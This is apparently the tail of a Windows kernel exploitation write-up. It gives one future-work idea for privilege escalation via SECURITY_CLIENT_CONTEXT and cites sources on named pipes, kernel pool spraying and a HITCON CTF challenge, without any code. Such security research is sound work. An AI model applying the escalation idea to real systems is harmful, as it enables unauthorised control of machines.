- It should be interesting to escalate privileges through the SECURITY_CLIENT_CONTEXT approach. (challenging but should be feasible)
- [1] Microsoft. "Named Pipes" (Win32 IPC documentation). https://docs.microsoft.com/en-us/windows/win32/ipc/named-pipes
- [2] Alex Ionescu. "Sheep Year Kernel Heap Fengshui: Spraying in the Big Kids’ Pool". https://www.alex-ionescu.com/?p=231
- [3] Corentin Bayet and Paul Fariello. "Scoop the Windows 10 pool!". https://github.com/synacktiv/Windows-kernel-SegmentHeap-Aligned-Chunk-Confusion
- [4] @scwuaptx. HITCON CTF 2020 challenge "lucifer". https://github.com/scwuaptx/CTF/tree/master/2020-writeup/hitcon/lucifer